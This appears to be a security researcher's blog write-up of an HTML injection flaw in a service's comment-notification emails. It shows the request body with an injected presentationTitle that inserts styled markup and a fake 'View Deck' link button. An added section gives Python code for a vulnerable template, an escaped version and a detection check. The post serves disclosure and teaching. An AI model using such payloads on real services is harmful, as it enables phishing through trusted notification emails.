Exploiting HTML Injection in Email
As a sequel to my last post, I’ll be discussing HTML injection on the same target. HTMLi is a vulnerability that can be exploited in any application that renders HTML code, and email happens to be one of them. The rest of this post explains how I was able to inject HTML into email via a comment notification feature on the target.
Remember the HTML injection left undiscussed here? It turned out that the values of the comment and presentationTitle parameters were reflected in the notification emails.
The body initially looked like the following:
{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"This is Redacted","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted Copy www.footstep.ninja","slideLocalId":"5p3nrib"}}
Then, after injecting the presentationTitle parameter with HTML attributes, it looks like the following:
{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49","data":{"comment":"Comments are great!","commenterId":"01234567","commenterProfileImage":"","presentationUUID":"x14r5K1tFnH","presentationTitle":"Welcome to Redacted\" <br/><br/> <div style='color:#1a3a69;line-height:1.5em;font-size:18px;text-align:center'>This is a test comment</div><br/> <a style='background-color:#f68270;border:1px solid #333333;border-color:#f68270;border-radius:6px;border-width:1px;color:#ffffff;display:inline-block;font-family:arial,helvetica,sans-serif;font-size:16px;font-weight:bold;letter-spacing:0px;line-height:16px;padding:12px 18px 12px 18px;text-align:center;text-decoration:none' href='https://footstep.ninja' target='_blank' data-saferedirecturl='https://footstep.ninja'>View Deck</a> <!-- Copy https://www.footstep.ninja","slideLocalId":"5p3nrib"}}
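To show what goes wrong on the server side, here is an added example (not code from the original post or the target): a hypothetical notification template that interpolates the JSON fields verbatim, the same template with every user-controlled field HTML-escaped, and a check that flags when raw markup from a field survives into the rendered email. The payload is a constructed, shortened copy of the injected body above; the template and URL are assumptions.

```python
import html
import json

# Constructed notification payload, modelled on the injected body shown above
# (presentationTitle carries a closing quote and raw markup).
NOTIFICATION_JSON = (
    '{"type":"SlideComment","recipients":[],"teamAlias":"EEqSBdu9z49",'
    '"data":{"comment":"Comments are great!","commenterId":"01234567",'
    '"presentationUUID":"x14r5K1tFnH",'
    '"presentationTitle":"Welcome to Redacted\\" <br/><div style=\'color:#1a3a69\'>'
    'This is a test comment</div>","slideLocalId":"5p3nrib"}}'
)

# Hypothetical email template; the target's real template is not on the page.
TEMPLATE = (
    '<p><b>{commenter}</b> commented on "{title}":</p>'
    '<blockquote>{comment}</blockquote>'
    '<a href="https://example.invalid/deck/{uuid}">View Deck</a>'
)

# Fields an end user controls through the comment feature.
USER_FIELDS = ("comment", "presentationTitle", "commenterId")


def render_vulnerable(payload: str) -> str:
    """Interpolates the fields verbatim, reproducing the flaw the post describes."""
    d = json.loads(payload)["data"]
    return TEMPLATE.format(commenter=d["commenterId"], title=d["presentationTitle"],
                           comment=d["comment"], uuid=d["presentationUUID"])


def render_safe(payload: str) -> str:
    """Same template, but every user-controlled field is escaped, quotes included,
    so a value can neither close the surrounding attribute nor open a new tag."""
    d = json.loads(payload)["data"]
    esc = lambda s: html.escape(s, quote=True)
    return TEMPLATE.format(commenter=esc(d["commenterId"]), title=esc(d["presentationTitle"]),
                           comment=esc(d["comment"]), uuid=esc(d["presentationUUID"]))


def untrusted_markup_rendered(rendered: str, payload: str) -> bool:
    """Detection check for a test suite: True if any user field containing '<'
    appears unmodified (i.e. unescaped) in the rendered email body."""
    d = json.loads(payload)["data"]
    return any("<" in d[f] and d[f] in rendered for f in USER_FIELDS)
```

Running the check over both renderers turns the finding into a regression test: the verbatim version trips it, the escaped version does not.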
A natural notification looks like the following:
And a supernatural one looks like this :D
Amazing, right? I got the exact HTML by viewing the original message: click the ellipsis and then click “Show Original”.
Thank you for your time. And I hope you enjoyed reading this.